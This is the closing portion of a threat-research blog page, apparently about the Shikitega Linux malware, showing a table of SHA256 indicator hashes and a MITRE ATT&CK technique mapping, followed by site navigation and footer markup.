			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:35px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:311px">
			<p>7c70716a66db674e56f6e791fb73f6ce62ca1ddd8b8a51c74fc7a4ae6ad1b3ad</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:35px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:33px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:311px">
			<p>2b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:216px">
			<p>Malware hash CVE-2021-3493</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:33px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:311px">
			<p>4dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:216px">
			<p>Malware hash CVE-2021-4034</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:33px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:311px">
			<p>e8e90f02705ecec9e73e3016b8b8fe915873ed0add87923bf4840831f807a4b4</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:33px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:311px">
			<p>64a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:216px">
			<p>Malware shell script</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:33px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:311px">
			<p>623e7ad399c10f0025fba333a170887d0107bead29b60b07f5e93d26c9124955</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:216px">
			<p>Malware shell script</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:33px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:311px">
			<p>59f0b03a9ccf8402e6392e07af29e2cfa1f08c0fc862825408dea6d00e3d91af</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:216px">
			<p>Malware shell script</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:33px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:311px">
			<p>9ca4fbfa2018fe334ca8f6519f1305c7fbe795af9eb62e9f58f09e858aab7338</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:216px">
			<p>Malware shell script</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:33px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:311px">
			<p>05727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:216px">
			<p>Malware shell script</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:1px solid #959595; border-left:1px solid #959595; border-right:1px solid #959595; border-top:none; height:33px; width:97px">
			<p>SHA256</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:311px">
			<p>ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d</p>
			</td>
			<td style="border-bottom:1px solid #959595; border-left:none; border-right:1px solid #959595; border-top:none; height:33px; width:216px">
			<p>Malware hash</p>
			</td>
		</tr>
	</tbody>
</table>

<h2>Mapped to MITRE ATT&amp;CK</h2>

<p>The findings of this report are mapped to the following <a href="https://attack.mitre.org/" target="_blank">MITRE ATT&amp;CK Matrix</a> techniques:</p>

<ul>
	<li>TA0002: Execution
	<ul>
		<li>T1059: Command and Scripting Interpreter</li>
		<li>T1569: System Service
		<ul>
			<li>T1569.002: Service Execution</li>
		</ul>
		</li>
	</ul>
	</li>
	<li>TA0003: Persistence
	<ul>
		<li>T1543: Create or Modify System Process</li>
	</ul>
	</li>
	<li>TA0005: Defense Evasion
	<ul>
		<li>T1027: Obfuscated Files or Information</li>
	</ul>
	</li>
</ul>
									</div>
									<div class="blog-related">
									<div class="be-ix-link-block"></div>
									</div>
								</div>
								<div class="blog-share">
									<h3>Share this with others</h3>
									<div class="blog-share-social-icons">

										<div class="sharethis-inline-share-buttons"></div>
									</div>
								</div>



								<div class="blog-categories">
								<p style="margin-bottom: 0px;">Tags: <a href="/blogs/tag/malware+research" title="malware research" rel="nofollow">malware research</a>, <a href="/blogs/tag/otx" title="otx" rel="nofollow">otx</a>, <a href="/blogs/tag/shikitega" title="shikitega" rel="nofollow">shikitega</a></p>
								</div>

							</div>
							
							<div class="col-sm-4 col-md-offset-1">
								<div>
									<div class="blog-sidebar-block">
    <form id="searchbox_002748587151982842036:gharkgtx6cu" action="/search-results/blog" class="sidebar-search">
        <input value="002748587151982842036:gharkgtx6cu" name="cx" type="hidden" />
        <input value="FORID:11" name="cof" type="hidden" />
        <div class="search-button">
            <input value="Search" name="sa" type="submit" />
        </div>
        <div class="search-field">
            <input id="q" name="q" type="text" aria-label="Search our blogs" placeholder="Search our blogs" />
        </div>
    </form>
</div>

									<div class="promo-block">
										
													
			<style type="text/css">#blog-promo-block-v2 .blog-promo-item-v2 {
    box-shadow: 1px 1px 5px #D2D2D229;
    border: 1px solid #D2D2D2;
    margin-bottom: 30px;
}
#blog-promo-block-v2 .blog-promo-item-v2 .blog-promo-resource-type-v2 {
    font-size: 14px;
    color: #0568AE;
    font-weight: 500;
    padding: 15px;
    margin: 0;
}
#blog-promo-block-v2 .blog-promo-item-v2 .blog-promo-item-text-v2 {
    margin-bottom:15px;
}
#blog-promo-block-v2 .blog-promo-item-v2 .blog-promo-item-text-v2 a {
    color: black;
    text-decoration: none;
    font-weight: 500;
}
#blog-promo-block-v2 .blog-promo-item-v2 .blog-promo-item-text-v2 p {
   margin: 0 15px;
}

#blog-promo-block-v2 .blog-promo-item-icon-v2 {
   margin: 15px;
   font-size: 16px;
}
#blog-promo-block-v2 .blog-promo-item-icon-v2 .icon-right {
    width: 20px;
    height: 20px;
    border: 1px solid #0568ae;
    border-radius: 20px;
    font-size: 9.5px;
    line-height: 18px;
    font-weight: 400;
    margin-right: 10px;
    padding-left: 4px;
    top: -1px;
}
@media (max-width: 1024px) {
 .blog-promo-item-v2 img {
    display: none;
  }
}
</style>
<div id="blog-promo-block-v2">
<h3>Featured resources</h3>

<div class="blog-promo-item-v2"><img alt="" src="https://cdn-cybersecurity.att.com/images/uploads/resource-images/5g-and-the-journey.jpg" />
<p class="blog-promo-resource-type-v2">INDUSTRY REPORT</p>

<div class="blog-promo-item-text-v2">
<p><a href="/resource-center/industry-reports/cybersecurity-insights-report-tenth-edition">AT&amp;T Cybersecurity Insights&trade; Report:<br />
5G and the Journey to the Edge</a></p>
</div>

<div class="blog-promo-item-icon-v2"><span aria-hidden="true" class="icon-right glyphicon glyphicon-chevron-right">&nbsp;</span> <a href="/resource-center/industry-reports/cybersecurity-insights-report-tenth-edition">Learn more</a></div>
</div>

<div class="blog-promo-item-v2"><img alt="" src="https://cdn-cybersecurity.att.com/images/uploads/resource-images/security-maturity-assessment.jpg" />
<p class="blog-promo-resource-type-v2">SELF ASSESSMENT</p>

<div class="blog-promo-item-text-v2">
<p><a href="/resource-center/security-maturity-assessment?utm_internal=blog-rail-assess">Benchmark your cybersecurity maturity</a></p>
</div>

<div class="blog-promo-item-icon-v2"><span aria-hidden="true" class="icon-right glyphicon glyphicon-chevron-right">&nbsp;</span> <a href="/resource-center/security-maturity-assessment?utm_internal=blog-rail-assess">Explore</a></div>
</div>
</div>
		
										

									</div>
								</div>
							</div>
						</div>
					</div>
				</section>


			</main>


			
			<style>

    /* Sticky button */
    .desktop .sticky_bottom_keeper {
        height: 80px;
    }
    .sticky_bottom_desktop.fixed {
        height: 80px;
    }
    .sticky_bottom_keeper .btn {
        color: #fff;
    }
    .sticky_bottom_keeper .btn-white {
        border: 2px solid #fff;
    }
    .sticky_bottom_keeper .btn-white.btn-border {
        background: transparent;
    }




    .line.line-8 {
        height: 8px;
    }

    .hh .sticky_bottom_keeper {
        display: none;
    }


</style>
<div class="sticky_bottom_keeper">

    <div class="sticky_bottom sticky_bottom_desktop ibp">
        <a href="/pricing/request-quote?utm_internal=sb_quote" class="btn btn-border btn-white btn-rounded btn-with-arrow">Get price</a>
        <a href="/products/usm-anywhere/free-trial?utm_internal=sb_freetrial_modal" class="btn btn-border btn-white btn-rounded btn-with-arrow">Free trial</a>

    </div>

</div>

			
		


		<footer id="footer" class="hidden-print">
  <div class="container-fluid">
    <div class="row">
      <div class="col-sm-6 col-md-3">
        
        <div class="footer_logo"><a href="https://business.att.com" target="_blank" rel="noopener"><img src="data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22263px%22%20height%3D%2256px%22%3E%3Crect%20fill%3D%22none%22%20width%3D%22263%22%20height%3D%2257%22%2F%3E%3C%2Fsvg%3E" data-original="https://cdn-cybersecurity.att.com/images/uploads/logos/att_biz_hz_pref_rgb_white.png" alt="AT&T Business"></a></div>
        <div class="footer_featured">

          <div class="footer_featured_title">From the Blog</div>
          <article class="footer_featured_article">
            <div class="footer_featured_article_author clearfix">
	            
										<img src="data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22150px%22%20height%3D%22150px%22%3E%3Crect%20fill%3D%22none%22%20width%3D%22150%22%20height%3D%22150%22%2F%3E%3C%2Fsvg%3E" data-original="/avatars/uploads/avatar_451.jpg" width="150" height="150" alt="Aaron Trofman" />
									
              <div class="footer_featured_article_author_data">
                <h4>Aaron Trofman</h4>
                <time datetime="2022-05-28">Sep 28, 2022</time>
              </div>
            </div>
            <h3><a href="https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-c2-over-port-22" id="footer-link-blog-post">Stories from the SOC - C2 over port 22</a></h3>
          </article>
          <a id="footer-link-blog-all" href="/blogs" class="footer_featured_more">Explore All Blog Posts
            &#8250;</a>
        </div>
        

        <div class="social-style">
          <a href="https://www.twitter.com/attcyber/" class="social-link-twitter" target="_blank">Twitter</a>
          <a href="https://www.linkedin.com/company/attcybersecurity/" class="social-link-linkedin" target="_blank">LinkedIn</a>
          <a href="https://www.facebook.com/ATTCyber/" class="social-link-facebook" target="_blank">Facebook</a>
          <a href="https://www.youtube.com/c/attcybersecurity" class="social-link-youtube" target="_blank">Youtube</a>
          <a href="https://www.instagram.com/attbusiness/" class="social-link-instagram" target="_blank">Instagram</a>
        </div>
      </div>

      <div class="col-sm-6 col-md-3">
        <div class="footer_links">
          <div class="heading">Who We Are</div>
          <ul>
            <li><a id="footer-link-labs" href="/alien-labs">Alien Labs</a></li>
            <li><a id="footer-link-customers" href="/who-we-are/customers">Customers</a></li>
            <li><a id="footer-link-careers" href="/who-we-are/careers">Careers</a></li>
            <li><a id="footer-link-contact" href="/contact">Contact Us</a></li>
          </ul>
        </div>

        <div class="footer_links">
          <div class="heading">News</div>
          <ul>
            <li><a id="footer-link-news-room" href="/who-we-are">Newsroom</a></li>
            <li><a id="footer-link-events" href="/who-we-are/events">Events</a></li>
            <li><a id="footer-link-blogs" href="/blogs">Blogs</a></li>
          </ul>
        </div>

        <div class="footer_links">
          <div class="heading">Partners</div>
          <ul>
            <li><a id="footer-link-partners" href="/partners">Partner Programs</a></li>
            <li><a id="footer-link-partner-portal" href="/partners/partner-portal/">Partner Portal</a></li>
          </ul>
        </div>
      </div>

      <div class="col-sm-6 col-md-3">
        <div class="footer_links">
          <div class="heading">Products</div>
          <ul>
		  	<li><a id="footer-link-mtdr" href="/products/managed-threat-detection-and-response">AT&T Managed Threat Detection and Response</a></li>
            <li><a id="footer-link-usm-anywhere" href="/products/usm-anywhere">USM Anywhere</a></li>
            <li><a id="footer-link-usm-mssp" href="/products/usm-for-mssp">XDR for MSSPs</a></li>
            <li><a id="footer-link-otx" href="/open-threat-exchange">Open Threat Exchange (OTX)</a></li>
            <li><a id="footer-link-ossim" href="/products/ossim">OSSIM</a></li>

          </ul>
        </div>



        <div class="footer_links">
          <div class="heading">Solutions</div>
          <ul>
            <li><a id="footer-link-cloud-security" href="/solutions/cloud-security-monitoring">Cloud Security Monitoring</a></li>
            <li><a id="footer-link-threat-detection" href="/solutions/threat-detection">Threat Detection</a></li>
            <li><a id="footer-link-ids" href="/solutions/intrusion-detection-system">Intrusion Detection</a></li>
            <li><a id="footer-link-siem" href="/solutions/siem-platform-solutions">SIEM platform solutions</a></li>
            <li><a id="footer-link-vulnerability" href="/solutions/vulnerability-assessment-remediation">Vulnerability
                Assessment</a></li>
            <li><a id="footer-link-all-solutions" class="btn-with-arrow" href="/solutions">See All Solutions</a></li>
          </ul>
        </div>
      </div>

      <div class="col-sm-6 col-md-3">
        <div class="footer_links">
          <div class="heading">Resources</div>
          <ul>
            <li><a id="footer-link-resources" href="/resource-center">Resources</a></li>
            <li><a id="footer-link-blog" href="/blogs">Blogs</a></li>
            <li><a id="footer-link-reference-guide" href="https://www.business.att.com/content/dam/attbusiness/guides/att-information-and-network-security-customer-reference-guide.pdf" target="_blank">Customer Reference Guide</a></li>

          </ul>
        </div>

        <div class="footer_links">
          <div class="heading">Customer Success</div>
          <ul>
            <li><a id="footer-link-support" href="/support">Support &amp; Services</a></li>
            <li><a id="footer-link-customer-portal" href="https://success.alienvault.com" target="_blank">Success Center</a></li>
            <li><a id="footer-link-documentation" href="/documentation">Documentation Center</a></li>
            <li><a id="footer-link-classroom-training" href="/training">Training</a></li>
            <li><a id="footer-link-certification" href="/certification">Certification</a></li>
          </ul>
        </div>

        <div class="footer_contact">
          <a href="/contact" id="footer-button-contact" class="btn btn-blue margin-bottom20">Contact us</a>
        </div>
      </div>
    </div>
    <div class="footer_legal">
      <p class="footer_legal_copy">&copy; Copyright 2022</p>
      <ul class="footer_legal_links">
        <li><a id="footer-link-privacy" href="/legal/privacy-policy">Privacy Policy</a></li>
        <li><a id="footer-link-terms" href="/terms/website-terms-of-use07may2018">Website Terms of Use</a></li>
        <li><a id="footer-link-gdpr" href="/legal/gdpr">GDPR</a></li>
        <li><a id="footer-link-cookie" href="/legal/cookie-policy">Cookie Policy</a></li>
        <li><a id="footer-link-personal-info" href="https://about.att.com/csr/home/privacy/rights_choices.html" target="_blank">Your Privacy Choices</a></li>

      </ul>
    </div>
  </div>
</footer>

<div id="valid_content"></div>

		
	<script src="https://cdn-cybersecurity.att.com/js/v2/imports/blog-bundle.min.js?v=20220927602681" defer></script>






		



<div class="cookie-notice">
    <p>We use cookies to provide you with a great user experience. By using our website, you agree to our <a href="https://www.att.com/privacy">Privacy Policy</a> and <a href="/terms/website-terms-of-use07may2018">Website Terms of Use</a>.</p>
    <a class="cookie-notice-close" href="#" aria-label="Close Cookie Notice"><span class="glyphicon glyphicon-remove"></span></a>
</div>


<!-- WGT-10310 -->

<!-- END WGT-10310 -->

<script type="text/javascript" async src="https://cdn-cybersecurity.att.com/js/v2/imports/vidyard-av.js" ></script>
<script type="text/javascript" defer src="//play.vidyard.com/embed/v4.js"></script>
<script type="text/javascript" defer src="//play.vidyard.com/v1/progress-events.js"></script>




<script>
if (typeof ddo !== "undefined") {initAdobePageTrackingFooter();}

function initAdobePageTrackingFooter() {
    
    customAdobeTrackingPageLoadObj['page.pageInfo.pageTitle'] = document.title.trim();

    

    customAdobeTrackingPageLoadObj['page.pageInfo.friendlyPageName'] = 'CYB '+ document.title.trim() +' Pg';

    customAdobeTrackingPageLoadObj['page.pageInfo.language'] = 'EN';
    customAdobeTrackingPageLoadObj['page.pageInfo.lineOfBusiness'] = 'Business Solutions';
    customAdobeTrackingPageLoadObj['page.category.pageFunction'] = 'Learn';
    customAdobeTrackingPageLoadObj['page.category.pageOwnership'] = 'Business';
    customAdobeTrackingPageLoadObj['page.attributes.applicationName'] = 'CYB';
    customAdobeTrackingPageLoadObj['page.pageInfo.appCode'] = 'ACS';
    customAdobeTrackingPageLoadObj['page.category.siteSection'] = 'CYB';
    customAdobeTrackingPageLoadObj['page.category.siteSection'] = 'CYB';
    customAdobeTrackingPageLoadObj['page.media.class'] = 'Text';
    customAdobeTrackingPageLoadObj['page.media.category'] = 'Security';
    customAdobeTrackingPageLoadObj['page.location.domain'] = window.location.hostname;
	ddo.pushEvent('pageLoad', 'Page_Load', customAdobeTrackingPageLoadObj);
}
</script>


		<script>
			window.addEventListener('DOMContentLoaded', function() {
				$(window).load(function () {
					var hideSubscribe = AV.Utilities.readCookie('stickyBlogSubscribe');
					// if the cookie hasn't been set...
					if (hideSubscribe == null) {
						setTimeout(function () {
							// make the modal appear
							$('#blog-subscribe-box').fadeIn();
						}, 10000);

						// when the "Close" button is clicked
						$('.blog-subscribe-close-btn').click(function (e) {
							e.preventDefault();
							// set the cookie
							AV.Utilities.setCookie('stickyBlogSubscribe', true, 1);
							$('#blog-subscribe-box').fadeOut();
						});
					}
				});
			});
		</script>

	<script type="text/javascript"  src="/JJXCMsWMNV/kL5kZpfY/-5/LOukpN3L7u/UhAMAQ/bGgs/BG4OXQkB"></script><link rel="stylesheet" type="text/css"  href="/_sec/cp_challenge/sec-3-8.css">
          <script  src="/_sec/cp_challenge/sec-cpt-3-8.js" async defer></script>
          <div id="sec-overlay" style="display:none;">
          <div id="sec-container">
          </div>
        </div></body>
</html>
<!-- Debug: total time - 0.0019800662994385 -->